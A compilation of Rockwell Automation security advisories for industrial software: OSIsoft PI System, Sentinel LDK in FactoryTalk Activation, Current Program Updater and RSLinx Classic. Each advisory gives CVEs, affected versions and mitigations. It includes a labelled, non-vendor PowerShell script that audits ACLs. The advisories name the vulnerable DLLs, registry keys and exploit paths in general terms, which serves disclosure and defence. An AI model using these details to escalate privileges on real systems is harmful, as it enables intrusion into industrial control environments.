We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (KAByrd@ra.rockwell.com).

Additional Links

  • 54102 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

High
PN1502 | PN1502 | OSIsoft PI System Vulnerabilities Affect Multiple Rockwell Automation Software Products
Published Date:
May 12, 2020
Last Updated:
May 12, 2020
CVE IDs:
CVE-2020-10608, CVE-2020-10606, CVE-2020-10645, CVE-2020-10600, CVE-2020-10610
Products:
FactoryTalk VantagePoint, FactoryTalk View SE, FactoryTalk Historian SE, PlantPAx, ThingWorx Connection Server
CVSS Scores:
7.8, 8.0, 5.9
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Revision History
Revision Number: 2.0
Version 2.0 - October 13, 2020. Updated risk mitigations and recommended user actions.
Version 1.0 - May 12, 2020. Initial Release.

Executive Summary

OSIsoft reported five vulnerabilities in PI System, a real-time data collection and visualization software, to Rockwell Automation. PI System software is used in multiple Rockwell Automation® software products. These vulnerabilities, if successfully exploited, may result in privilege escalation, information disclosure or a denial-of-service condition.

Not every PI System vulnerability applies to each impacted product. Please see the table under Affected Products for a full list of the affected Rockwell Automation products and the corresponding PI System vulnerability.

Customers using affected products are encouraged to evaluate their own systems and apply the appropriate risk mitigations from those listed below. Additional details relating to the discovered vulnerabilities and recommended countermeasures are provided herein.

Affected Products

Product CVE-2020-10610 CVE-2020-10608 CVE-2020-10606 CVE-2020-10600 CVE-2020-10645
FactoryTalk® View SE software version 11.00.00 and earlier X X X
FactoryTalk® VantagePoint® software version 8.10.00 and earlier X X X
FactoryTalk Historian - ThingWorx Connector software version 3.00.00 X X X
FactoryTalk Historian SE software version 6.00.00 and earlier X X X X
PlantPAx® DCS software (including Virtual Templates) version 4.60.00 and earlier X X X
FactoryTalk ProcessBook software version 3.60.00 and earlier X X X X
FactoryTalk Datalink software version 5.30.00 and earlier X X X
FactoryTalk Historian SE to Historian SE (SE2SE) Interface software version 3.08.07 and earlier X X X
FactoryTalk Historian SE Interface for Universal File Loader software version 3.01.02 and earlier X X X
FactoryTalk Historian SE Interface for ODBC (RDBMS) software version 3.20.06 and earlier X X X
FactoryTalk Historian Batch Interface software version 1.00.20 and earlier X X X
FactoryTalk Historian Event Frames Generator (PE EFGen) software version 4.00.25 and earlier X X X
FactoryTalk Historian SE Advance Server software version 6.00.00 and earlier X X X
FactoryTalk Historian SE third-party OLEDB Connectivity software version 4.00.00 and earlier X X X
FactoryTalk Historian SE third-party OPC Connectivity software version 4.00.00 and earlier X X X

Vulnerability Details

OSIsoft provided the vulnerability details in their security advisory.

CVE-2020-10610: Local Privilege Escalation via Uncontrolled Search Path Element
A local attacker can modify a search path and plant a binary to exploit the affected PI System software and take control of the local computer at system level privileges, resulting in unauthorized information disclosure, deletion or modification.

CVSS v3 Base Score: 7.8/10 (HIGH)
CVSS Vector String: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2020-10608: Local Privilege Escalation via Improper Verification of Cryptographic Signature
A local attacker can plant a binary and bypass a code integrity check for loading PI System libraries. Exploitation can target another local user of the software to escalate privilege, resulting in unauthorized information disclosure, deletion or modification.

CVSS v3 Base Score: 7.8/10 (HIGH)
CVSS Vector String: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2020-10606: Local Privilege Escalation via Incorrect Default Permissions
A local attacker can exploit incorrect permissions set by affected PI System software. Exploitation can result in unauthorized disclosure, deletion, or modification if the local computer also processes PI System data from other users such as a shared workstation or terminal server deployment.

CVSS v3 Base Score: 7.8/10 (HIGH)
CVSS Vector String: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2020-10600: Null Pointer Dereference may cause Denial-of-Service conditions
A remote, authenticated attacker could crash PI Archive Subsystem when the subsystem is working under memory pressure. This can result in blocking queries to PI Data Archive and may cause denial-of-service conditions.

CVSS v3 Base Score: 5.9/10 (MEDIUM)
CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H

CVE-2020-10645: Use of Out-of-range Pointer Offset may lead to Remote Code Execution
A remote, authenticated attacker could embed malicious content in the display file of the impacted software product. When opened by an affected version, the attacker could read, write and execute code on the computer with the impacted software in the context of the current user.

CVSS v3 Base Score: 8.0/10 (HIGH)*
CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

* Note: OSIsoft calculated the Temporal CVSS metrics for this vulnerability, which brings the score to a 6.4/10 (MEDIUM)

Risk Mitigation & User Action

Currently, Rockwell Automation is working to address these vulnerabilities and will continue to provide updates and user guidance as these fixes become available. Please subscribe to security updates to this advisory and the Industrial Security Index (Knowledgebase PN1354) to stay notified.

Customers currently using any of the affected software are encouraged to take the following actions:

v2.0 - Update:

Product | CVE Identifiers | Suggested Action
FactoryTalk® View SE software | CVE-2020-10606, CVE-2020-10608, CVE-2020-10610 | Download v12.00.00 or later.
FactoryTalk Historian SE | CVE-2020-10600, CVE-2020-10606, CVE-2020-10608, CVE-2020-10610 | Download v7.00.00 or later.
PlantPAx® DCS software (including Virtual Templates) | CVE-2020-10606, CVE-2020-10608, CVE-2020-10610 | Download v5.00 or later.
FactoryTalk ProcessBook software | CVE-2020-10606, CVE-2020-10608, CVE-2020-10610, CVE-2020-10645 | Download v3.70.01 or later.
FactoryTalk Datalink software | CVE-2020-10606, CVE-2020-10608, CVE-2020-10610 | Download v5.50.02 or later.
FactoryTalk Historian SE Interface for Universal File Loader software | CVE-2020-10606, CVE-2020-10608, CVE-2020-10610 | Download v3.60.07 or later.
FactoryTalk Historian SE Interface for ODBC (RDBMS) software | CVE-2020-10606, CVE-2020-10608, CVE-2020-10610 | Download v3.24.05 or later.
FactoryTalk Historian Event Frames Generator (PE EFGen) software | CVE-2020-10606, CVE-2020-10608, CVE-2020-10610 | Download v4.00.40 or later.
FactoryTalk Historian SE Advance Server software | CVE-2020-10606, CVE-2020-10608, CVE-2020-10610 | Download v7.00.00 or later.
FactoryTalk Historian SE third-party OLEDB Connectivity software | CVE-2020-10606, CVE-2020-10608, CVE-2020-10610 | Download v7.00.00 or later.
FactoryTalk Historian SE third-party OPC Connectivity software | CVE-2020-10606, CVE-2020-10608, CVE-2020-10610 | Download v7.00.00 or later.

v1.0 - Initial Release:
Customers currently using any of the affected software that is not listed in the table above are encouraged to take the following actions:

Vulnerability Identifier Suggested Actions
CVE-2020-10610
  • Work with your IT administrator to manage permissions on the HKLM\Software\PISystem and HKLM\Software\WOW6432Node\PISystem registry keys to block a high impact exploit path.
  • Monitor the above keys and the following folder: ProgramData\PISystem for any unauthorized changes.
  • See Knowledgebase ID QA59280 for details on setting registry permissions.
  • See Knowledgebase ID QA59281 for details on monitoring the registry.
CVE-2020-10608
  • Restrict network connections from PI client workstations to trusted AF servers (TCP port 5457)
CVE-2020-10606
  • Evaluate and disable unused PI Buffering services from PI client workstations (PI Buffer Subsystem, PI Buffer Server)
  • By default, buffering is not configured. If buffering is configured, the preferred method of authentication is to use Windows Authentication for the connection from the Buffer to the Historian.
  • See Knowledgebase ID QA59282 to check whether PI Buffering is enabled.
CVE-2020-10600
  • Limit console and remote desktop logon access to authorized administrators for normally unattended PI System servers and interface nodes.
CVE-2020-10645
  • Delete lfmngu.dll from the %PIHOME%\Procbook directory (typically C:\Program Files (x86)\Rockwell Software\FactoryTalk Historian\PIPC\Procbook or C:\Program Files (x86)\PIPC\Procbook).
  • The third-party library is not needed for supported PI ProcessBook features.
  • See Knowledgebase Document ID QA56969 for other possible default installation paths.

General Security Guidelines

  • Run all software as user, not as an administrator, to minimize the impact of malicious code on the infected system.
  • (CVE-2020-10610 & CVE-2020-10608) Use of Microsoft® AppLocker or other similar whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID 546989.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID 494865.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (kabyrd@ra.rockwell.com).

Additional Links

  • 54102 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • ICS Advisory (ICSA-20-133-02)

Critical
PN1500 | PN1500 | FactoryTalk Activation Affected by Sentinel LDK Vulnerabilities
Published Date:
April 23, 2020
Last Updated:
April 23, 2020
CVE IDs:
CVE-2017-12819, CVE-2019-8282, CVE-2017-11497, CVE-2017-11496, CVE-2017-12818, CVE-2017-11498, CVE-2017-12821, CVE-2017-12822, CVE-2019-8283, CVE-2017-12820
Products:
FactoryTalk Activation
CVSS Scores:
7.5, 9.9, 9.8, 5.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Revision History
Revision Number: 1.0
Version 1.0 - April 23, 2020. Initial Release

Executive Summary

Kaspersky, a cybersecurity company, alerted Rockwell Automation of ten vulnerabilities in the hasplms service that is part of Gemalto’s HASP SRM, Sentinel HASP, and Sentinel LDK products. FactoryTalk® Activation provides the user a way to install the Sentinel LDK Runtime Environment. The Sentinel LDK Runtime Environment allows the installation of the necessary drivers to use Flexera dongles. Customers who are not using Flexera dongles to store activations would not be impacted by these vulnerabilities.

These vulnerabilities are remotely exploitable and may allow threat actors to cause a denial-of-service (DoS) condition or execute arbitrary code if successfully exploited.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk Activation Manager v4.03.11 and below
  • Includes Sentinel LDK Runtime Environment v7.50

Vulnerability Details

CVE-2017-12822: Remote Code Execution (RCE) via Admin Interface
A remote, unauthenticated attacker may enable and disable the admin interface in the Sentinel LDK Runtime Environment, which may allow the attacker to achieve remote code execution.

CVSS v3.0 Base Score: 9.9/CRITICAL
CVSS v3.0 Vector String: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L

CVE-2017-11496: Arbitrary Code Execution via Malformed ASN.1 Streams
A stack buffer overflow in hasplms in Gemalto ACC (Admin Control Center) may allow a remote, unauthenticated attacker to execute arbitrary code via malformed ASN.1 streams in V2C and similar input files.

CVSS v3.0 Base Score: 9.8/CRITICAL
CVSS v3.0 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2017-11497: Arbitrary Code Execution via Language Packs with Filenames Longer than 1024 Characters
A stack buffer overflow in hasplms in Gemalto ACC (Admin Control Center) may allow a remote, unauthenticated attacker to execute arbitrary code via language packs containing filenames longer than 1024 characters.

CVSS v3.0 Base Score: 9.8/CRITICAL
CVSS v3.0 Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2017-12819: NTLM-Relay Attack via Remote Manipulations with Language Pack Updater
Manipulations with language pack updater may allow a remote, unauthenticated attacker to perform a NTLM-relay (NT Lan Manager) attack for system users. Successful exploitation of this vulnerability may cause a NTLM-hash capture that could lead to unknown impacts.

CVSS v3.0 Base Score: 9.8/CRITICAL
CVSS v3.0 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2017-12821: Remote Code Execution via Memory Corruption
An XML payload with more than the supported number of elements leads to a buffer overflow of a variable in stack. Successful exploitation may allow a remote, unauthenticated attacker to cause denial-of-service (DoS) conditions or remote code execution.

CVSS v3.0 Base Score: 9.8/CRITICAL
CVSS v3.0 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2017-11498: Denial of Service (DoS) via Language Pack (ZIP file) with Invalid HTML Files
Language packs (ZIP files) with invalid HTML files lead to null pointer dereferences, which could be exploited by malicious HTML files. Successful exploitation may allow a remote, unauthenticated attacker to cause denial of service (DoS) conditions.

CVSS v3.0 Base Score: 7.5/HIGH
CVSS v3.0 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2017-12818: Denial of Service (DoS) via Stack Overflow in Custom XML-Parser
A stack overflow in custom XML-parser in Sentinel LDK may allow a remote, unauthenticated attacker to cause a denial-of-service (DoS) condition.

CVSS v3.0 Base Score: 7.5/HIGH
CVSS v3.0 Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2017-12820: Denial of Service (DoS) via Arbitrary Memory Read from Controlled Memory Pointer
An arbitrary memory read from controlled memory pointer in Sentinel LDK may allow a remote, unauthenticated attacker to cause a denial-of-service (DoS) condition.

CVSS v3.0 Base Score: 7.5/HIGH
CVSS v3.0 Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2019-8282: Man-in-the-Middle (MITM) Attack via Cleartext HTTP Communications
Gemalto ACC (Admin Control Center) uses cleartext HTTP to obtain language packs. A skilled remote attacker may be able to perform a Man-in-the-Middle (MITM) attack and replace the original language pack with a malicious one. User interaction is required in order for attackers to successfully exploit this vulnerability.

CVSS v3.0 Base Score: 5.3/MEDIUM
CVSS v3.0 Vector String: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N

CVE-2019-8283: Hasplm Cookie Does Not Have an HttpOnly Attribute
The Hasplm cookie in Gemalto ACC (Admin Control Center) is set without the HttpOnly flag. This may allow a remote attacker to steal the cookie with malicious JavaScript. User interaction is required.

CVSS v3.0 Base Score: 5.3/MEDIUM
CVSS v3.0 Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Risk Mitigation & User Action

Customers using the affected versions of FactoryTalk Activation are encouraged to update to FactoryTalk Activation version 4.04.00 or greater. This version addresses the associated risk and uses a version of Sentinel LDK Runtime Environment with no known vulnerabilities associated with it at time of publication.

General Security Guidelines

  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that EtherNet/IP™ traffic from unauthorized sources is blocked.
  • Block all traffic to EtherNet/IP or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation® Products, refer to Knowledgebase Article ID 898270.
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker or other similar Whitelisting application can help mitigate risk.  Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID 546989.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (kabyrd@ra.rockwell.com).

ADDITIONAL LINKS
  • 54102 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • ICS Advisory (ICSA-18-032-03) – Gemalto Sentinel License Manager

High
PN1498 | Current Program Updater Vulnerable to Privilege Escalation
Published Date:
April 09, 2020
Last Updated:
April 09, 2020
CVE IDs:
CVE-2017-5176
Products:
Current Program Updater v1.1.0.7
CVSS Scores:
7.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 - April 09, 2020. Initial Release.

Executive Summary

Rockwell Automation received a vulnerability report from Reid Wightman, a researcher from Dragos, regarding a file permission vulnerability affecting several Dynamic Link Library (DLL) files added during installation of the Current Program Updater software. If successfully exploited, this vulnerability may allow a local attacker to escalate privileges on the targeted PC to gain system administrative control.

Current Program Updater is installed with the Product Selection Toolbox™ suite along with other toolkits. For a full list, please see the affected products below.

Affected Products

Current Program Updater v1.1.0.7 and earlier.

The following tools use the affected version of Current Program Updater:

  • Batch Accelerator Toolkit v1.0.0.0
  • CENTERLINE® 2500 Global Production v1.0.4.0 and earlier
  • CENTERLINE Builder v3.19.0829.02
  • Computer Numerical Control (CNC) Accelerator Toolkit v0.0.0.0
  • Connected Components Accelerator Tool Kit v1.1.0.0 to v3.4.0.0
  • Connected Components Workbench™ software (CCW) v11 and earlier
  • Drives & Motions Accelerator Toolkit v1.0.0.0
  • Energy Management Accelerator Toolkit v3.0.0.0 and earlier
  • PowerOne v1.51.55 and earlier
  • Product Selection Toolbox Suite:
    • CrossWorks™ v4.3.0.11 and earlier
    • Integrated Architecture® Builder v9.7.9.1 and earlier
    • MCSStar v5.1.0.7
    • ProposalWorks™ v10.0.7185.14602 and earlier
    • Product Selection Toolbox Installer v.18.09.x and earlier
    • Prosafe® Builder v1.1.0.0 and earlier
    • Safety Automation Builder® v3.1.0.2 and earlier
    • User-Defined Devices v1.6.0.12 and earlier
  • Safety Accelerator Toolkit v6.0.0.0 and earlier
  • Water Wastewater Accelerator Toolkit v3 and earlier

Vulnerability Details

CVE-2017-5176: File Permission Vulnerability Leading to Privilege Escalation
A local, authenticated attacker could write to several directories containing Dynamic Link Library (DLL) files that execute with SYSTEM-level privilege. The DLL files inherit the permissions of those directories, so DLLs that run at the system level can be overwritten by a normal user; replacing one with attacker-controlled code leads to an escalation of privileges. Certain registry keys were also found to be writable by normal users.

A CVSS v3 base score of 7.0/High has been assigned; the CVSS v3 vector string is CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Risk Mitigation & User Action

Customers currently using any of the affected tools are encouraged to take the following actions:

  1. Existing customers using affected versions of the tools should update to the newest version of the tools. Existing users can do this by running an update in Current Program Updater. New users can do this by accepting and running the Current Program Updater update offered immediately during installation. After the tool runs, it will apply the most recent version of Current Program Updater as well as the most recent version of the tools currently installed. Fixed versions of toolkits will no longer allow the toolkits to make changes to the access controls of files and registry keys.
  2. Work with your IT administrators to ensure that the following files and registry keys have the correct access control permissions. Ensure that the least-privilege user principle is followed, and user/service account access is only granted with a minimum number of rights as needed.
Toolkit: Impacted Registry Keys or Files

All Tools:
  C:\Windows\SysWOW64\raise.dll
  C:\Windows\SysWOW64\SSPodt.exe
  HKEY_CLASSES_ROOT\RAISE
Batch Accelerator Toolkit:
  HKEY_CLASSES_ROOT\RAISE\Installed Components\Batch
CENTERLINE 2500 Global Product Configuration Builder:
  HKEY_CLASSES_ROOT\RAISE\Installed Components\Installed Components\EST_Adv
CENTERLINE Builder:
  HKEY_CLASSES_ROOT\RAISE\Installed Components\CENTERLINEBuilder
CNC Accelerator Toolkit:
  HKEY_CLASSES_ROOT\RAISE\Installed Components\CMAT
Connected Components Accelerator Tool Kit:
  HKEY_CLASSES_ROOT\RAISE\Installed Components\CCAT
Current Program Updater:
  HKEY_CLASSES_ROOT\RAISE\Installed Components\Shared
Drives and Motion Accelerator Toolkit:
  HKEY_CLASSES_ROOT\RAISE\Installed Components\Simp_DMAT
Energy Management Accelerator Toolkit:
  HKEY_CLASSES_ROOT\RAISE\Installed Components\Simp_EMAT
Product Selection Toolbox Suite:
  HKEY_CLASSES_ROOT\RAISE\Installed Components\Shared
Safety Accelerator Toolkit:
  HKEY_CLASSES_ROOT\RAISE\Installed Components\Simp_SafetyGuardLogix
Water Wastewater Accelerator Toolkit:
  HKEY_CLASSES_ROOT\RAISE\Installed Components\Simp_WWWAT
  3. If a toolkit has been installed to a custom directory, customers are encouraged to identify what other directories may have had their access permissions modified by the toolkits and work with their IT administrator to ensure those directories have the correct level of permissions. Ensure that the least-privilege user principle is followed, and user/service account access is only granted with the minimum number of rights needed. To identify these directories, customers can review the list at the following registry key:

     HKEY_CLASSES_ROOT\RAISE\Installed Components
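The permission check in step 2 above can be scripted. The following PowerShell is an added example and is not part of the Rockwell advisory or its tools: it reads the ACL of each file and registry key listed in the table and reports any write-class right held by a principal that every standard user belongs to, which is exactly the condition CVE-2017-5176 depends on. It assumes the default install locations from the table, an elevated session (so every ACL can be read), and the principal and rights lists below, which reflect common Windows defaults rather than a Rockwell-specified baseline. The same function can be pointed at any other path, including directories found under the Installed Components key in step 3.

```powershell
# Added example, not from the Rockwell advisory. Assumptions: default install
# locations, an elevated PowerShell session, and the principal/rights lists below.

$Targets = @(
    'C:\Windows\SysWOW64\raise.dll',
    'C:\Windows\SysWOW64\SSPodt.exe',
    'Registry::HKEY_CLASSES_ROOT\RAISE'
)

# Principals that any standard (non-administrator) user is a member of.
$LowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a user replace a binary or value, or re-grant themselves access.
$FileWriteMask = [System.Security.AccessControl.FileSystemRights](
    'WriteData, AppendData, CreateFiles, Write, Modify, ' +
    'Delete, ChangePermissions, TakeOwnership, FullControl')
$RegWriteMask  = [System.Security.AccessControl.RegistryRights](
    'SetValue, CreateSubKey, Delete, WriteKey, ChangePermissions, TakeOwnership, FullControl')

function Test-WeakAcl {
    <# Emits one object per (path, principal) pair where a low-privileged principal
       holds any write-class right. No output means the audited ACLs are clean. #>
    param([Parameter(Mandatory)][string[]]$Path)

    foreach ($p in $Path) {
        if (-not (Test-Path -LiteralPath $p)) {
            Write-Warning "Not found (toolkit not installed, or custom directory?): $p"
            continue
        }
        $isRegistry = ($p -like 'Registry::*') -or ($p -like 'HK*:*')
        $acl = Get-Acl -LiteralPath $p

        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }

            # Generic rights (GENERIC_WRITE etc.) appear as raw integers and are not
            # decoded here; they are uncommon on explicitly set ACEs.
            $rights = if ($isRegistry) { [int]$ace.RegistryRights } else { [int]$ace.FileSystemRights }
            $mask   = if ($isRegistry) { [int]$RegWriteMask }      else { [int]$FileWriteMask }

            if (($rights -band $mask) -ne 0) {
                [pscustomobject]@{
                    Path      = $p
                    Principal = $ace.IdentityReference.Value
                    Rights    = if ($isRegistry) { $ace.RegistryRights } else { $ace.FileSystemRights }
                    Inherited = $ace.IsInherited
                }
            }
        }
    }
}

# Step 3 of the advisory: list what the toolkits registered under this key so any
# custom install directories can be audited with the same function.
$installed = 'Registry::HKEY_CLASSES_ROOT\RAISE\Installed Components'
if (Test-Path -LiteralPath $installed) {
    Get-ChildItem -LiteralPath $installed | Select-Object -ExpandProperty PSChildName
}

Test-WeakAcl -Path $Targets | Format-Table -AutoSize

# Remediation hint (apply deliberately, not automatically): a file under SysWOW64
# should simply inherit the directory ACL, which 'icacls <file> /reset' restores.
```

Each reported row names a principal that should not hold write rights on a SYSTEM-level binary or key; an `Inherited` value of `False` indicates an explicit ACE the installer set, which is the case the advisory describes.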

The following toolkits are considered End of Life (EOL):

  • Connected Components Accelerator Tool Kit
  • Drives & Motions Accelerator
  • CNC Accelerator Toolkit
  • Safety Accelerator Toolkit
  • Energy Management Accelerator Toolkit
  • Water Wastewater Accelerator Toolkit

Suggested action: Customers are encouraged to discontinue use of these toolkits, uninstall them if possible, and follow the remediation steps outlined above.

General Security Guidelines

  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker or other similar whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID 546989.
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (KAByrd@ra.rockwell.com).

ADDITIONAL LINKS

  • 54102 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • https://www.us-cert.gov/ics/advisories/ICSA-17-047-01

High
PN1499 | RSLinx Classic Privilege Escalation Vulnerability
Published Date:
April 09, 2020
Last Updated:
April 09, 2020
CVE IDs:
CVE-2020-10642
Products:
RSLinx Classic (Single Node
CVSS Scores:
8.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 - April 09, 2020. Initial Release.

Executive Summary

Rockwell Automation received a report from the researcher William Knowles at Applied Risk regarding a vulnerability in RSLinx® Classic software, which if successfully exploited, could allow an authenticated attacker to gain elevated or SYSTEM level privileges.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

RSLinx Classic versions 4.11.00 and earlier.

Vulnerability Details

CVE-2020-10642: Privilege Escalation via Weak Registry Key Permissions
An authenticated, local attacker could modify a registry key that has weak permissions, which could lead to the execution of malicious code when RSLinx Classic is opened. The code would run with the same privileges as RSLinx Classic and could therefore be used for privilege escalation.

CVSS v3.0 Base Score: 8.8/HIGH
CVSS v3.0 Vector String: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected versions of RSLinx Classic are encouraged to update to an available software version that addresses the associated risk. Customers who are unable to update are directed towards the risk mitigation strategies provided below and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Product Family Suggested Actions
RSLinx Classic: Apply Patch 1091155 (Download). The patch can be applied to v3.60 through v4.11, but customers are encouraged to apply the most recent version of RSLinx Classic.

General Security Guidelines

  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker or other similar whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID 546989.
  • Ensure that the least-privilege user principle is followed and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

Please direct all media inquiries to Kolve Byrd (KAByrd@ra.rockwell.com).

ADDITIONAL LINKS

  • 54102 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

Critical
PN1027 | Stratix 5950 Contains Multiple Vulnerabilities
Published Date:
April 07, 2020
Last Updated:
April 07, 2020
CVE IDs:
CVE-2018-0228, CVE-2018-0296, CVE-2018-0227, CVE-2018-0231, CVE-2018-0240
Products:
Stratix 5950 Security Appliance
CVSS Scores:
7.5, 10.0, 8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 - June 21, 2018. Initial Release.
Version 1.1 - April 07, 2020. Updates to mitigations and other languages.

